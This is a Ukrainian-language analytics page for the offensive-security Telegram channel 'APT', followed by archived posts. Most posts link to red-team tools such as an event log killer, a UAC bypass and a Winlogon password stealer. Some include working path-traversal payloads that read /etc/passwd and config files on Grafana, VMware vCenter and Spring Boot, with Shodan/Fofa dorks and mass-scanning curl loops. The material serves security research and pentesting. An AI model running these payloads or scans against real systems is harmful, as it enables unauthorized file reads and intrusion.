uk
Feedback
APT

APT

Відкрити в Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Показати більше

📈 Аналітичний огляд Telegram-каналу APT

Канал APT (@apt_notes) у мовному сегменті Англійська є активним учасником. На даний момент спільнота об'єднує 14 682 підписників, посідаючи 8 834 місце в категорії Технології та додатки та 45 554 місце у регіоні Росія.

📊 Показники аудиторії та динаміка

З моменту свого створення невідомо, проект продемонстрував стрімке зростання, зібравши аудиторію у 14 682 підписників.

За останніми даними від 13 червня, 2026, канал демонструє стабільну активність. Хоча за останні 30 днів спостерігається зміна кількості учасників на 414, а за останні 24 години на 17, загальне охоплення залишається високим.

  • Статус верифікації: Не верифікований
  • Рівень залученості (ER): Середній показник залученості аудиторії становить 50.76%. Протягом перших 24 годин після публікації контент зазвичай збирає N/A% реакцій від загальної кількості підписників.
  • Охоплення публікацій: В середньому кожен допис отримує 7 449 переглядів. Протягом першої доби публікація в середньому набирає 0 переглядів.
  • Реакції та взаємодія: Аудиторія активно підтримує контент: середня кількість реакцій на один пост – 20.

📝 Опис та контентна політика

Автор описує ресурс як майданчик для висловлення суб'єктивної думки:
This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

Завдяки високій частоті оновлень (останні дані отримано 14 червня, 2026), канал підтримує актуальність та високий рівень охоплення публікацій. Аналітика показує, що аудиторія активно взаємодіє з контентом, що робить його важливою точкою впливу в категорії Технології та додатки.

14 682
Підписники
+1724 години
+1027 днів
+41430 день
Архів дописів
APT
14 682
Grafana — Unauthorized Arbitrary Read File The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects
Grafana — Unauthorized Arbitrary Read File The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+ Dorks: Shodan: title:"Grafana" Fofa.so: app="Grafana" ZoomEye: grafana PoC http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.ini The "plugin-id" could be any plugin that exists in the system One line command to detect: echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0' #grafana #lfi #bugbounty #pentest

APT
14 682
PowerRunAsAttached This script allows to spawn a new interactive console as another user account in the same calling console
PowerRunAsAttached This script allows to spawn a new interactive console as another user account in the same calling console (console instance/window). Example: Invoke-RunAsAttached -Username "darkcodersc" -Password "testmepliz" https://github.com/DarkCoderSc/PowerRunAsAttached #runas #powershell #pentest #tools

APT
14 682
#bugbounty #hints
+8
#bugbounty #hints

APT
14 682
Design Issues Of Modern EDRs: Bypassing ETW-Based Solutions https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassi
Design Issues Of Modern EDRs: Bypassing ETW-Based Solutions https://www.binarly.io/posts/Design_issues_of_modern_EDRs_bypassing_ETW-based_solutions/index.html #etw #redteam #blueteam #malware

APT
14 682
Rodan Telecom Exploitation Framework Rodan is a telecom signaling exploitation framework created and maintained by Etisalat Egypt Research Labs (E-Labs). This framework includes a suite of modules that enable users to exploit vulnerabilities in the signaling protocols used by mobile operators. Rodan currently supports SS7 and Diameter protocols with plans to support GTP and SIP. https://github.com/Etisalat-Egypt/Rodan #telecom #ss7 #gtp #sip

APT
14 682
Phant0m — Windows Event Log Killer Phant0m targets the Event Log service and finding the process responsible for the Event Lo
Phant0m — Windows Event Log Killer Phant0m targets the Event Log service and finding the process responsible for the Event Log service, it detects and kills the threads responsible for the Event Log service. Thus, while the Event Log service appears to be running in the system (because Phant0m didn't kill process), it does not actually run (because Phant0m killed threads) and the system does not collect logs. https://github.com/hlldz/Phant0m #windows #events #log #killer

APT
14 682
UAC bypass - DLL hijacking This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verifica
UAC bypass - DLL hijacking This is a PoC for bypassing UAC using DLL hijacking and abusing the "Trusted Directories" verification. https://github.com/SecuProject/DLLHijackingScanner #uac #bypass #dll #hijacking

APT
14 682
jq + grep + fzf + curl = SharpCollection https://github.com/Flangvik/SharpCollection
alias SharpCollection='print -z `curl -sSL "https://api.github.com/repos/Flangvik/SharpCollection/git/trees/master?recursive=1" | jq -r ".tree[].path" | grep \\.exe | while read line; do echo "curl -sSL https://github.com/Flangvik/SharpCollection/raw/master/$line >"; done | fzf --tac`'

#csharp #collection #tooling

APT
14 682
KeyHacks Keyhacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. https://github.com/streaak/keyhacks #api #key #check #bugbounty

APT
14 682
Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver (CVE-2021-42008) CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access. https://syst3mfailure.io/sixpack-slab-out-of-bounds #linux #6pack #lpe #cve

APT
14 682
OffensiveNim — PowerShell Using Nim to load the CLR and execute PowerShell without the need for PowerShell.exe, now with printing the output as well! https://github.com/Alh4zr3d/OffensiveNim/blob/master/src/execute_powershell_bin.nim #offensive #nim #powershell

APT
14 682
Webapp Wordlists This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version. https://github.com/p0dalirius/webapp-wordlists #wordlist #cms #bugbounty

APT
14 682
VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS cat target.txt| while read host do;do curl --insecure --path-as-is -s "
VMware vCenter (7.0.2.00100) — File Read + SSRF + XSS cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done Shodan Dorks: http.title:"ID_VC_Welcome" Zoomeye Dorks: app:"VMware vCenter" https://github.com/l0ggg/VMware_vCenter #vmware #vcenter #bugbounty

APT
14 682
Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234) http://localhost:8887/manage/log/view?filename=/etc/passw
Spring Boot Actuator — Logview Directory Traversal (CVE-2021-21234)
http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../

Details: https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/ #spring #actuator #cve #bugbounty

APT
14 682
CHAPS — Configuration Hardening Assessment PowerShell Script CHAPS is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed. The purpose of this script is to run it on a server or workstation to collect configuration information about that system. The information collected can then be used to provide recommendations (and references) to improve the security of the individual system and systemic issues within the organization's Windows environment. https://github.com/cutaway-security/chaps #powershell #hardening #assessment #blueteam

APT
14 682
ManageEngine ADSelfService Plus — Authentication Bypass (CVE-2021-40539) Details: https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html Exploit: https://github.com/synacktiv/CVE-2021-40539 #adselfservice #cve #auth #bypass

APT
14 682
How Windows Stops Kerberos Usernames Being Case Sensitive https://vbscrub.com/2021/11/29/how-windows-stops-kerberos-usernames-being-case-sensitive/ #kerberos #pre_auth #aes_salt

APT
14 682
COM Objects P.1: The Hidden Backdoor in Your System A deeper dive into COM objects: how to utilize them in redteam engagements, and how to detect and protect organizations from them if you are on the blueteam side. https://medium.com/maltrak/com-objects-p-1-the-hidden-backdoor-in-your-system-947ac4285e85 #com #backdoor #redteam #blueteam

APT
14 682
DetectionLabELK DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has
DetectionLabELK DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts. https://github.com/cyberdefenders/DetectionLabELK #blueteam #detection #elk #lab

APT
14 682
Winlogon Password Leaking The flow is: — user enters password — winlogon loads mpnotify.exe — mpnotify opens RPC channel — wi
Winlogon Password Leaking The flow is: — user enters password — winlogon loads mpnotify.exe — mpnotify opens RPC channel — winlogon sends pass via RPC — mpnotify forwards to DLL — DLL stores it on disk https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy #winlogon #password #leak #redteam